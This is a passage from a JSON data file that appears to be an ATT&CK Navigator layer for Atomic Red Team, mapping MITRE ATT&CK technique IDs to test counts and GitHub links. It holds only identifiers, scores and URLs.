Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
